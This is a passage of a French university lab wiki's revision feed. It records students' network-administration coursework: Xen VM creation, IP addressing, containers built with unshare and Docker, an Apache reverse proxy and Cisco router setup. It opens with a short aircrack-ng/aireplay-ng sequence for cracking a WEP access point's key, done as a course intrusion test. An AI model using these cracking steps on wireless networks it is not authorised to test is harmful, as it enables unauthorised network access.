* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49077</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49077"/>
				<updated>2018-12-21T11:17:26Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
